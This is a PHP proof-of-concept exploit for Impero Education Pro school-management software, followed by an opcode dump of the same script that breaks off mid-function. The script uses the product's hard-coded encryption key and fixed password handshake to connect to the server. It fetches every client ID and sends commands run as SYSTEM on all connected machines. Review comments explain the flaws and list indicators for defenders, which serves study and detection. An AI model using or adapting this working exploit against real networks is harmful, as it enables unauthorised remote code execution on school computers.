<?php
// Impero Education Pro SYSTEM-RCE PoC
// by slipstream/RoL^LHQ
// greets to everyone in lizardhq! :)
//
// Review notes (what this listing demonstrates, read from the code below):
//  * Every frame is encrypted with a key and IV that are both cut from
//    SHA-512 of one constant string, so the "encryption" identifies nobody:
//    any peer that knows the constant can produce frames the other side
//    will decrypt successfully.
//  * The handshake in Connect() sends a fixed literal and expects "AUTH:OK";
//    no per-deployment secret appears anywhere in this script.
//  * Once connected, the script asks the server for its client list and has
//    the server relay command messages to every client ID returned.
//  * Observable artefacts for defenders: a UDP probe carrying the string
//    "ARE_YOU_IMPERO_SERVER" to port 30016, TCP sessions to port 30015 from
//    hosts that are not management consoles, and (per the author's own
//    comment in RunCmd) server log entries whose operator is "unknown".

// Pads $str up to the next multiple of 16 bytes.
// $pad is always 1..16, so a full extra block is added when the input is
// already aligned. The filler is $pad - 1 random bytes followed by one byte
// holding $pad itself. mt_rand() is not a CSPRNG; here it only produces
// filler that UnPadString() discards.
function PadString($str) {
    $size = 16;
    $pad = $size - (strlen($str) % $size);
    $padstr = '';
    for ($i = 1; $i < $pad; $i++) $padstr .= chr(mt_rand(0,255));
    return $str.$padstr.chr($pad);
}

// Reverses PadString(): reads the last byte as a count and drops that many
// bytes from the end. The count is not validated against the block size.
function UnPadString($str) {
    return substr($str,0,-(ord(substr($str,-1))));
}

// Encrypts $str with Rijndael-128 in CBC mode through the mcrypt extension.
// Key = first 0x20 bytes of SHA-512('Imp3ro'), IV = the following 0x10 bytes.
// Both are therefore identical for every message and every installation
// this script talks to; nothing here is negotiated or random.
function CryptString($str) {
    $hash = hash('sha512','Imp3ro',true);
    $key = substr($hash,0,0x20);
    $iv = substr($hash,0x20,0x10);
    $crypted = mcrypt_encrypt(MCRYPT_RIJNDAEL_128,$key,PadString($str),'cbc',$iv);
    return $crypted;
}

// Inverse of CryptString(): same constant-derived key and IV, then strips
// the padding. There is no MAC or other integrity check on the ciphertext.
function DecryptString($str) {
    $hash = hash('sha512','Imp3ro',true);
    $key = substr($hash,0,0x20);
    $iv = substr($hash,0x20,0x10);
    return UnPadString(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,$key,$str,'cbc',$iv));
}

// Sends one frame on socket $h.
// Plaintext layout: "<socketid>|<payload>"; wire layout: "<decimal length of
// ciphertext>|<ciphertext>". $socketid is the global that RecvNetwork() fills
// in from the first reply (it is still -1 for the very first frame).
function SendNetwork($h,$str) {
    global $socketid;
    $crypted = CryptString($socketid."|".$str);
    socket_write($h,strlen($crypted).'|'.$crypted);
    return;
}

// Receives one frame from socket $h and returns its payload.
// Reads the decimal length prefix one byte at a time up to the '|'
// separator, then reads the ciphertext with a single socket_read() call.
// NOTE(review): a single socket_read() may return fewer than $len bytes;
// the script does not loop to collect the remainder.
function RecvNetwork($h) {
    $len = '';
    $chr = '';
    do {
        $len .= $chr;
        $chr = socket_read($h,1);
    } while ($chr != '|');
    $len = (int)($len);
    // A non-numeric or zero prefix casts to < 1 and aborts the whole script.
    if ($len < 1) die("Something's wrong. Length isn't an int.");
    socket_set_block($h);
    $crypted = socket_read($h,$len);
    $dec = DecryptString($crypted);
    global $socketid;
    // Decrypted frames have the same "<id>|<payload>" layout as sent ones.
    $dec = explode('|',$dec,2);
    // Adopt whatever id the peer put in its first frame; later frames
    // leave the global untouched.
    if ($socketid == -1) $socketid = $dec[0];
    return $dec[1];
}

// Opens a TCP connection to $host:$port (default 30015), runs the fixed
// handshake and returns the socket, or false when the connection or the
// handshake fails. Progress is echoed to stdout.
function Connect($host,$port = 30015) {
    echo "Connecting...";
    $h = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);
    // socket_set_block() runs before $h is checked for failure.
    socket_set_block($h);
    if ((!$h) || (!socket_connect($h,$host,$port))) {
        echo "failed.\n";
        return false;
    }
    echo "done!\nAuthenticating...";
    // authenticate: the credential is the literal below, not a secret
    // supplied by the caller.
    SendNetwork($h,"AUTHENTICATE\x02PASSWORD");
    echo "done!\nWaiting for response...";
    // we should get "AUTH:OK" back
    $data = RecvNetwork($h);
    if ($data != "AUTH:OK") {
        echo "authentication failed.\n";
        return false;
    }
    echo "authentication succeeded!\nNegotiating...";
    // Fixed negotiation message: a host name, the value 5003 and five
    // 32-hex-digit values, all hard-coded (their meaning is not shown here).
    SendNetwork($h,"PING1\x02IE11WIN7\x03\x035003\x019f579e0f20cb18c8bc1ee4f2dc5d9aeb\x01c0d3fd41a05add5e6d7c8b64924bef86\x018dc3a6ceec8a51e1fd2e7e688db44417\x01d1554e349fc677e6011309683ac1b85b\x012b94f70093e484b8fc7f62a4670377ea");
    // we get sent 4 loads of packets. discard all.
    for ($i = 0; $i < 4; $i++) {
        RecvNetwork($h);
        usleep(500000);
    }
    // Disabled by the author: an ANNOUNCE message describing a client machine.
    //SendNetwork($h,"-1|ANNOUNCE\x01600\x012\x01-1\x02IE11WIN7\x03IEUser\x03\x031\x03\x030\x031\x036\x0308:00:27:85:C5:CD,08:00:27:D0:C2:E1\x0310.0.2.15,192.168.56.101\x035003\x032015-06-11 12:17:19\x0310.0.2.255,192.168.56.255\x03None,Everyone,Users,INTERACTIVE,CONSOLE LOGON,Authenticated Users,This Organization,Local account,LOCAL,NTLM Authentication\x035003\x032.0.50727.5485\x03IE11WIN7\x03NODOMAIN");
    echo "done!\n";
    return $h;
}

// Requests the client list over socket $h and returns an array holding the
// first \x03-separated field of every line in the reply (the client IDs,
// according to the author's comment).
function GetAllClients($h) {
    $pline = "SENDCLIENTS\x01604\x011\x010\x02";
    echo "Getting all clients...";
    SendNetwork($h,$pline);
    $data = RecvNetwork($h);
    // grab the base64 blob: everything after the last \x02 in the reply
    $data = array_pop(explode("\x02",$data));
    // unbase64 and uncompress
    $data = gzdecode(base64_decode($data));
    $ret = array();
    foreach (explode("\r\n",$data) as $line) {
        // we only care about clientIDs
        $ret[] = array_shift(explode("\x03",$line));
    }
    echo "done!\n";
    return $ret;
}

// Sends one ECHO/SENDCOMMANDMSG message addressed to the comma-joined client
// IDs in $ids, carrying $cmdline. Nothing is read back.
function RunCmd($h,$ids,$cmdline) {
    global $socketid; // declared but not used in this function
    $ids = implode(',',$ids);
    $pline = "ECHO\x01\x01".$ids."\x01SENDCOMMANDMSG\x010\x02\x01\x01".$cmdline;
    echo "Sending evil RunCMD data...";
    SendNetwork($h,$pline);
    echo "done!\n";
    // if this was a real, properly negotiated client we'd get something back
    // however, we aren't, and we're masquerading as client #0; thus, we don't.
    // this does show up in logs, with the executed command. however, the server doesn't know who ran it, so it shows up as "unknown". :)
    // (For defenders: by this account the server log keeps the command text,
    // so entries attributed to "unknown" are worth alerting on.)
}

// Sends one ECHO/OPENFILE message addressed to the comma-joined client IDs in
// $ids, naming $exe and the account string "NT AUTHORITY\SYSTEM". Nothing is
// read back.
function RunExeAsSystem($h,$ids,$exe) {
    global $socketid; // declared but not used in this function
    $ids = implode(',',$ids);
    $pline = "ECHO\x01\x01".$ids."\x01OPENFILE\x010\x02".$exe."\x08\x08NT AUTHORITY\SYSTEM\x08Password";
    echo "Sending evil RunEXE data...";
    SendNetwork($h,$pline);
    echo "done!\n";
    // we don't get a response from this one
}

// Broadcast discovery: sends "ARE_YOU_IMPERO_SERVER" over UDP to $addr port
// 30016 via interface $if and waits up to 6 seconds for an 18-byte reply.
// Returns the sender's IP when the reply is "I_AM_IMPERO_SERVER", else false.
// Both strings travel unencrypted, which makes the probe easy to match in a
// network monitor.
function FindImperoServer($if,$addr) {
    $sock = socket_create(AF_INET, SOCK_DGRAM, SOL_UDP);
    socket_set_option($sock, SOL_SOCKET, SO_BROADCAST, 1);
    socket_set_option($sock,SOL_SOCKET,IP_MULTICAST_IF,$if);
    $str = "ARE_YOU_IMPERO_SERVER";
    socket_sendto($sock, $str, strlen($str), MSG_DONTROUTE, $addr, 30016);
    socket_set_option($sock,SOL_SOCKET,SO_RCVTIMEO,array("sec"=>6,"usec"=>0));
    $r = socket_recvfrom($sock, $buf, 18, 0, $remote_ip, $remote_port);
    if ($buf == "I_AM_IMPERO_SERVER") return $remote_ip;
    return false;
}

// Command-line driver. -1 marks "no id learned yet" for RecvNetwork().
$socketid = -1;
echo "[*] Impero Education Pro SYSTEM-RCE PoC by slipstream/RoL^LHQ\n";
if ($argc < 2) {
    echo "[-] Usage: ".$argv[0]." <serverIPs space-delimited>\n";
    echo "[*] If you pass \"detect <if> <broadcastmask>\" (without quotes) as serverIP then we will try to find an impero server, using interface and broadcast mask given.\n";
    echo "[*] Example of this: ".$argv[0]." detect vboxnet0 192.168.56.255\n";
    echo "[*] This PoC will pop a calc and run whoami > C:\lol.txt as SYSTEM on *every connected client*!\n";
    die();
}
// Drop the script name so $argv holds only the arguments.
array_shift($argv);
foreach ($argv as $key=>$arg) {
    $detected = false;
    if ($arg == "detect") {
        // "detect" needs two following arguments (interface, broadcast address).
        if ($key + 2 >= count($argv)) continue;
        echo "[*] Finding Impero server...\n";
        $arg = FindImperoServer($argv[$key+1],$argv[$key+2]);
        if ($arg == false) die("[-] Cannot find Impero server\n");
        echo "[+] Found Impero server at ".$arg."\n";
        $detected = true;
    }
    $h = Connect($arg);
    if ($h === false) continue;
    $clients = GetAllClients($h);
    // Demonstration payloads chosen by the author: a calculator and a whoami
    // written to a file, sent to every client ID the server returned.
    RunExeAsSystem($h,$clients,"calc");
    RunCmd($h,$clients,"whoami > C:\lol.txt");
    echo "\n";
    // In detect mode the remaining arguments were consumed as parameters, so stop.
    if ($detected) die();
}
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 43) Position 1 = 4, Position 2 = 15
Branch analysis from position: 4
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 15
2 jumps found. (Code = 77) Position 1 = 19, Position 2 = 71
Branch analysis from position: 19
2 jumps found. (Code = 78) Position 1 = 20, Position 2 = 71
Branch analysis from position: 20
2 jumps found. (Code = 43) Position 1 = 24, Position 2 = 46
Branch analysis from position: 24
2 jumps found. (Code = 43) Position 1 = 28, Position 2 = 29
Branch analysis from position: 28
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
Branch analysis from position: 29
2 jumps found. (Code = 43) Position 1 = 41, Position 2 = 42
Branch analysis from position: 41
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 42
2 jumps found. (Code = 43) Position 1 = 52, Position 2 = 53
Branch analysis from position: 52
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
Branch analysis from position: 53
2 jumps found. (Code = 43) Position 1 = 69, Position 2 = 70
Branch analysis from position: 69
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 70
1 jumps found. (Code = 42) Position 1 = 19
Branch analysis from position: 19
Branch analysis from position: 46
Branch analysis from position: 71
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 71
filename:       /in/f2jt8
function name:  (null)
number of ops:  73
compiled vars:  !0 = $socketid, !1 = $argc, !2 = $argv, !3 = $arg, !4 = $key, !5 = $detected, !6 = $h, !7 = $clients
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
  141     0  E >   ASSIGN                                                   !0, -1
  142     1        ECHO                                                     '%5B%2A%5D+Impero+Education+Pro+SYSTEM-RCE+PoC+by+slipstream%2FRoL%5ELHQ%0A'
  143     2        IS_SMALLER                                               !1, 2
          3      > JMPZ                                                     ~9, ->15
  144     4    >   FETCH_DIM_R                                      ~10     !2, 0
          5        CONCAT                                           ~11     '%5B-%5D+Usage%3A+', ~10
          6        CONCAT                                           ~12     ~11, '+%3CserverIPs+space-delimited%3E%0A'
          7        ECHO                                                     ~12
  145     8        ECHO                                                     '%5B%2A%5D+If+you+pass+%22detect+%3Cif%3E+%3Cbroadcastmask%3E%22+%28without+quotes%29+as+serverIP+then+we+will+try+to+find+an+impero+server%2C+using+interface+and+broadcast+mask+given.%0A'
  146     9        FETCH_DIM_R                                      ~13     !2, 0
         10        CONCAT                                           ~14     '%5B%2A%5D+Example+of+this%3A+', ~13
         11        CONCAT                                           ~15     ~14, '+detect+vboxnet0+192.168.56.255%0A'
         12        ECHO                                                     ~15
  147    13        ECHO                                                     '%5B%2A%5D+This+PoC+will+pop+a+calc+and+run+whoami+%3E+C%3A%5Clol.txt+as+SYSTEM+on+%2Aevery+connected+client%2A%21%0A'
  148    14      > EXIT                                                     
  150    15    >   INIT_FCALL                                               'array_shift'
         16        SEND_REF                                                 !2
         17        DO_ICALL                                                 
  151    18      > FE_RESET_R                                       $17     !2, ->71
         19    > > FE_FETCH_R                                       ~18     $17, !3, ->71
         20    >   ASSIGN                                                   !4, ~18
  152    21        ASSIGN                                                   !5, <false>
  153    22        IS_EQUAL                                                 !3, 'detect'
         23      > JMPZ                                                     ~21, ->46
  154    24    >   ADD                                              ~22     !4, 2
         25        COUNT                                            ~23     !2
         26        IS_SMALLER_OR_EQUAL                                      ~23, ~22
         27      > JMPZ                                                     ~24, ->29
         28    > > JMP                                                      ->19
  155    29    >   ECHO                                                     '%5B%2A%5D+Finding+Impero+server...%0A'
  156    30        INIT_FCALL                                               'findimperoserver'
         31        ADD                                              ~25     !4, 1
         32        FETCH_DIM_R                                      ~26     !2, ~25
         33        SEND_VAL                                                 ~26
         34        ADD                                              ~27     !4, 2
         35        FETCH_DIM_R                                      ~28     !2, ~27
         36        SEND_VAL                                                 ~28
         37        DO_FCALL                                      0  $29     
         38        ASSIGN                                                   !3, $29
  157    39        BOOL_NOT                                         ~31     !3
         40      > JMPZ                                                     ~31, ->42
         41    > > EXIT                                                     '%5B-%5D+Cannot+find+Impero+server%0A'
  158    42    >   CONCAT                                           ~32     '%5B%2B%5D+Found+Impero+server+at+', !3
         43        CONCAT                                           ~33     ~32, '%0A'
         44        ECHO                                                     ~33
  159    45        ASSIGN                                                   !5, <true>
  161    46    >   INIT_FCALL                                               'connect'
         47        SEND_VAR                                                 !3
         48        DO_FCALL                                      0  $35     
         49        ASSIGN                                                   !6, $35
  162    50        TYPE_CHECK                                    4          !6
         51      > JMPZ                                                     ~37, ->53
         52    > > JMP                                                      ->19
  163    53    >   INIT_FCALL                                               'getallclients'
         54        SEND_VAR                                                 !6
         55        DO_FCALL                                      0  $38     
         56        ASSIGN                                                   !7, $38
  164    57        INIT_FCALL                                               'runexeassystem'
         58        SEND_VAR                                                 !6
         59        SEND_VAR                                                 !7
         60        SEND_VAL                                                 'calc'
         61        DO_FCALL                                      0          
  165    62        INIT_FCALL                                               'runcmd'
         63        SEND_VAR                                                 !6
         64        SEND_VAR                                                 !7
         65        SEND_VAL                                                 'whoami+%3E+C%3A%5Clol.txt'
         66        DO_FCALL                                      0          
  166    67        ECHO                                                     '%0A'
  167    68      > JMPZ                                                     !5, ->70
         69    > > EXIT                                                     
  151    70    > > JMP                                                      ->19
         71    >   FE_FREE                                                  $17
  168    72      > RETURN                                                   1

Function padstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 18
Branch analysis from position: 18
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 9
Branch analysis from position: 20
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 9
2 jumps found. (Code = 44) Position 1 = 20, Position 2 = 9
Branch analysis from position: 20
Branch analysis from position: 9
filename:       /in/f2jt8
function name:  PadString
number of ops:  27
compiled vars:  !0 = $str, !1 = $size, !2 = $pad, !3 = $padstr, !4 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    6     0  E >   RECV                                             !0      
    7     1        ASSIGN                                                   !1, 16
    8     2        STRLEN                                           ~6      !0
          3        MOD                                              ~7      ~6, !1
          4        SUB                                              ~8      !1, ~7
          5        ASSIGN                                                   !2, ~8
    9     6        ASSIGN                                                   !3, ''
   10     7        ASSIGN                                                   !4, 1
          8      > JMP                                                      ->18
   11     9    >   INIT_FCALL                                               'chr'
         10        INIT_FCALL                                               'mt_rand'
         11        SEND_VAL                                                 0
         12        SEND_VAL                                                 255
         13        DO_ICALL                                         $12     
         14        SEND_VAR                                                 $12
         15        DO_ICALL                                         $13     
         16        ASSIGN_OP                                     8          !3, $13
   10    17        PRE_INC                                                  !4
         18    >   IS_SMALLER                                               !4, !2
         19      > JMPNZ                                                    ~16, ->9
   12    20    >   CONCAT                                           ~17     !0, !3
         21        INIT_FCALL                                               'chr'
         22        SEND_VAR                                                 !2
         23        DO_ICALL                                         $18     
         24        CONCAT                                           ~19     ~17, $18
         25      > RETURN                                                   ~19
   13    26*     > RETURN                                                   null

End of function padstring

Function unpadstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/f2jt8
function name:  UnPadString
number of ops:  16
compiled vars:  !0 = $str
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   15     0  E >   RECV                                             !0      
   16     1        INIT_FCALL                                               'substr'
          2        SEND_VAR                                                 !0
          3        SEND_VAL                                                 0
          4        INIT_FCALL                                               'ord'
          5        INIT_FCALL                                               'substr'
          6        SEND_VAR                                                 !0
          7        SEND_VAL                                                 -1
          8        DO_ICALL                                         $1      
          9        SEND_VAR                                                 $1
         10        DO_ICALL                                         $2      
         11        MUL                                              ~3      $2, -1
         12        SEND_VAL                                                 ~3
         13        DO_ICALL                                         $4      
         14      > RETURN                                                   $4
   17    15*     > RETURN                                                   null

End of function unpadstring

Function cryptstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/f2jt8
function name:  CryptString
number of ops:  33
compiled vars:  !0 = $str, !1 = $hash, !2 = $key, !3 = $iv, !4 = $crypted
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   19     0  E >   RECV                                             !0      
   20     1        INIT_FCALL                                               'hash'
          2        SEND_VAL                                                 'sha512'
          3        SEND_VAL                                                 'Imp3ro'
          4        SEND_VAL                                                 <true>
          5        DO_ICALL                                         $5      
          6        ASSIGN                                                   !1, $5
   21     7        INIT_FCALL                                               'substr'
          8        SEND_VAR                                                 !1
          9        SEND_VAL                                                 0
         10        SEND_VAL                                                 32
         11        DO_ICALL                                         $7      
         12        ASSIGN                                                   !2, $7
   22    13        INIT_FCALL                                               'substr'
         14        SEND_VAR                                                 !1
         15        SEND_VAL                                                 32
         16        SEND_VAL                                                 16
         17        DO_ICALL                                         $9      
         18        ASSIGN                                                   !3, $9
   23    19        INIT_FCALL_BY_NAME                                       'mcrypt_encrypt'
         20        FETCH_CONSTANT                                   ~11     'MCRYPT_RIJNDAEL_128'
         21        SEND_VAL_EX                                              ~11
         22        SEND_VAR_EX                                              !2
         23        INIT_FCALL                                               'padstring'
         24        SEND_VAR                                                 !0
         25        DO_FCALL                                      0  $12     
         26        SEND_VAR_NO_REF_EX                                       $12
         27        SEND_VAL_EX                                              'cbc'
         28        SEND_VAR_EX                                              !3
         29        DO_FCALL                                      0  $13     
         30        ASSIGN                                                   !4, $13
   24    31      > RETURN                                                   !4
   25    32*     > RETURN                                                   null

End of function cryptstring

Function decryptstring:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/f2jt8
function name:  DecryptString
number of ops:  32
compiled vars:  !0 = $str, !1 = $hash, !2 = $key, !3 = $iv
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   27     0  E >   RECV                                             !0      
   28     1        INIT_FCALL                                               'hash'
          2        SEND_VAL                                                 'sha512'
          3        SEND_VAL                                                 'Imp3ro'
          4        SEND_VAL                                                 <true>
          5        DO_ICALL                                         $4      
          6        ASSIGN                                                   !1, $4
   29     7        INIT_FCALL                                               'substr'
          8        SEND_VAR                                                 !1
          9        SEND_VAL                                                 0
         10        SEND_VAL                                                 32
         11        DO_ICALL                                         $6      
         12        ASSIGN                                                   !2, $6
   30    13        INIT_FCALL                                               'substr'
         14        SEND_VAR                                                 !1
         15        SEND_VAL                                                 32
         16        SEND_VAL                                                 16
         17        DO_ICALL                                         $8      
         18        ASSIGN                                                   !3, $8
   31    19        INIT_FCALL                                               'unpadstring'
         20        INIT_FCALL_BY_NAME                                       'mcrypt_decrypt'
         21        FETCH_CONSTANT                                   ~10     'MCRYPT_RIJNDAEL_128'
         22        SEND_VAL_EX                                              ~10
         23        SEND_VAR_EX                                              !2
         24        SEND_VAR_EX                                              !0
         25        SEND_VAL_EX                                              'cbc'
         26        SEND_VAR_EX                                              !3
         27        DO_FCALL                                      0  $11     
         28        SEND_VAR                                                 $11
         29        DO_FCALL                                      0  $12     
         30      > RETURN                                                   $12
   32    31*     > RETURN                                                   null

End of function decryptstring

Function sendnetwork:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 62) Position 1 = -2
filename:       /in/f2jt8
function name:  SendNetwork
number of ops:  18
compiled vars:  !0 = $h, !1 = $str, !2 = $socketid, !3 = $crypted
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   34     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   35     2        BIND_GLOBAL                                              !2, 'socketid'
   36     3        INIT_FCALL                                               'cryptstring'
          4        CONCAT                                           ~4      !2, '%7C'
          5        CONCAT                                           ~5      ~4, !1
          6        SEND_VAL                                                 ~5
          7        DO_FCALL                                      0  $6      
          8        ASSIGN                                                   !3, $6
   37     9        INIT_FCALL_BY_NAME                                       'socket_write'
         10        SEND_VAR_EX                                              !0
         11        STRLEN                                           ~8      !3
         12        CONCAT                                           ~9      ~8, '%7C'
         13        CONCAT                                           ~10     ~9, !3
         14        SEND_VAL_EX                                              ~10
         15        DO_FCALL                                      0          
   38    16      > RETURN                                                   null
   39    17*     > RETURN                                                   null

End of function sendnetwork

Function recvnetwork:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 44) Position 1 = 11, Position 2 = 3
Branch analysis from position: 11
2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 16
Branch analysis from position: 15
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 16
2 jumps found. (Code = 43) Position 1 = 37, Position 2 = 39
Branch analysis from position: 37
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 39
Branch analysis from position: 3
filename:       /in/f2jt8
function name:  RecvNetwork
number of ops:  42
compiled vars:  !0 = $h, !1 = $len, !2 = $chr, !3 = $crypted, !4 = $dec, !5 = $socketid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   41     0  E >   RECV                                             !0      
   42     1        ASSIGN                                                   !1, ''
   43     2        ASSIGN                                                   !2, ''
   45     3    >   ASSIGN_OP                                     8          !1, !2
   46     4        INIT_FCALL_BY_NAME                                       'socket_read'
          5        SEND_VAR_EX                                              !0
          6        SEND_VAL_EX                                              1
          7        DO_FCALL                                      0  $9      
          8        ASSIGN                                                   !2, $9
   47     9        IS_NOT_EQUAL                                             !2, '%7C'
         10      > JMPNZ                                                    ~11, ->3
   48    11    >   CAST                                          4  ~12     !1
         12        ASSIGN                                                   !1, ~12
   49    13        IS_SMALLER                                               !1, 1
         14      > JMPZ                                                     ~14, ->16
         15    > > EXIT                                                     'Something%27s+wrong.+Length+isn%27t+an+int.'
   50    16    >   INIT_FCALL_BY_NAME                                       'socket_set_block'
         17        SEND_VAR_EX                                              !0
         18        DO_FCALL                                      0          
   51    19        INIT_FCALL_BY_NAME                                       'socket_read'
         20        SEND_VAR_EX                                              !0
         21        SEND_VAR_EX                                              !1
         22        DO_FCALL                                      0  $16     
         23        ASSIGN                                                   !3, $16
   52    24        INIT_FCALL                                               'decryptstring'
         25        SEND_VAR                                                 !3
         26        DO_FCALL                                      0  $18     
         27        ASSIGN                                                   !4, $18
   53    28        BIND_GLOBAL                                              !5, 'socketid'
   54    29        INIT_FCALL                                               'explode'
         30        SEND_VAL                                                 '%7C'
         31        SEND_VAR                                                 !4
         32        SEND_VAL                                                 2
         33        DO_ICALL                                         $20     
         34        ASSIGN                                                   !4, $20
   55    35        IS_EQUAL                                                 !5, -1
         36      > JMPZ                                                     ~22, ->39
         37    >   FETCH_DIM_R                                      ~23     !4, 0
         38        ASSIGN                                                   !5, ~23
   56    39    >   FETCH_DIM_R                                      ~25     !4, 1
         40      > RETURN                                                   ~25
   57    41*     > RETURN                                                   null

End of function recvnetwork

Function connect:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 47) Position 1 = 17, Position 2 = 24
Branch analysis from position: 17
2 jumps found. (Code = 43) Position 1 = 25, Position 2 = 27
Branch analysis from position: 25
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 27
2 jumps found. (Code = 43) Position 1 = 39, Position 2 = 41
Branch analysis from position: 39
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 41
1 jumps found. (Code = 42) Position 1 = 55
Branch analysis from position: 55
2 jumps found. (Code = 44) Position 1 = 57, Position 2 = 48
Branch analysis from position: 57
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 48
2 jumps found. (Code = 44) Position 1 = 57, Position 2 = 48
Branch analysis from position: 57
Branch analysis from position: 48
Branch analysis from position: 24
filename:       /in/f2jt8
function name:  Connect
number of ops:  60
compiled vars:  !0 = $host, !1 = $port, !2 = $h, !3 = $data, !4 = $i
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   59     0  E >   RECV                                             !0      
          1        RECV_INIT                                        !1      30015
   60     2        ECHO                                                     'Connecting...'
   61     3        INIT_FCALL_BY_NAME                                       'socket_create'
          4        FETCH_CONSTANT                                   ~5      'AF_INET'
          5        SEND_VAL_EX                                              ~5
          6        FETCH_CONSTANT                                   ~6      'SOCK_STREAM'
          7        SEND_VAL_EX                                              ~6
          8        FETCH_CONSTANT                                   ~7      'SOL_TCP'
          9        SEND_VAL_EX                                              ~7
         10        DO_FCALL                                      0  $8      
         11        ASSIGN                                                   !2, $8
   62    12        INIT_FCALL_BY_NAME                                       'socket_set_block'
         13        SEND_VAR_EX                                              !2
         14        DO_FCALL                                      0          
   63    15        BOOL_NOT                                         ~11     !2
         16      > JMPNZ_EX                                         ~11     ~11, ->24
         17    >   INIT_FCALL_BY_NAME                                       'socket_connect'
         18        SEND_VAR_EX                                              !2
         19        SEND_VAR_EX                                              !0
         20        SEND_VAR_EX                                              !1
         21        DO_FCALL                                      0  $12     
         22        BOOL_NOT                                         ~13     $12
         23        BOOL                                             ~11     ~13
         24    > > JMPZ                                                     ~11, ->27
   64    25    >   ECHO                                                     'failed.%0A'
   65    26      > RETURN                                                   <false>
   67    27    >   ECHO                                                     'done%21%0AAuthenticating...'
   69    28        INIT_FCALL                                               'sendnetwork'
         29        SEND_VAR                                                 !2
         30        SEND_VAL                                                 'AUTHENTICATE%02PASSWORD'
         31        DO_FCALL                                      0          
   70    32        ECHO                                                     'done%21%0AWaiting+for+response...'
   72    33        INIT_FCALL                                               'recvnetwork'
         34        SEND_VAR                                                 !2
         35        DO_FCALL                                      0  $15     
         36        ASSIGN                                                   !3, $15
   73    37        IS_NOT_EQUAL                                             !3, 'AUTH%3AOK'
         38      > JMPZ                                                     ~17, ->41
   74    39    >   ECHO                                                     'authentication+failed.%0A'
   75    40      > RETURN                                                   <false>
   77    41    >   ECHO                                                     'authentication+succeeded%21%0ANegotiating...'
   78    42        INIT_FCALL                                               'sendnetwork'
         43        SEND_VAR                                                 !2
         44        SEND_VAL                                                 'PING1%02IE11WIN7%03%035003%019f579e0f20cb18c8bc1ee4f2dc5d9aeb%01c0d3fd41a05add5e6d7c8b64924bef86%018dc3a6ceec8a51e1fd2e7e688db44417%01d1554e349fc677e6011309683ac1b85b%012b94f70093e484b8fc7f62a4670377ea'
         45        DO_FCALL                                      0          
   80    46        ASSIGN                                                   !4, 0
         47      > JMP                                                      ->55
   81    48    >   INIT_FCALL                                               'recvnetwork'
         49        SEND_VAR                                                 !2
         50        DO_FCALL                                      0          
   82    51        INIT_FCALL                                               'usleep'
         52        SEND_VAL                                                 500000
         53        DO_ICALL                                                 
   80    54        PRE_INC                                                  !4
         55    >   IS_SMALLER                                               !4, 4
         56      > JMPNZ                                                    ~23, ->48
   85    57    >   ECHO                                                     'done%21%0A'
   86    58      > RETURN                                                   !2
   87    59*     > RETURN                                                   null

End of function connect

Function getallclients:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 32, Position 2 = 43
Branch analysis from position: 32
2 jumps found. (Code = 78) Position 1 = 33, Position 2 = 43
Branch analysis from position: 33
1 jumps found. (Code = 42) Position 1 = 32
Branch analysis from position: 32
Branch analysis from position: 43
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 43
filename:       /in/f2jt8
function name:  GetAllClients
number of ops:  

Generated using Vulcan Logic Dumper, using php 8.0.0

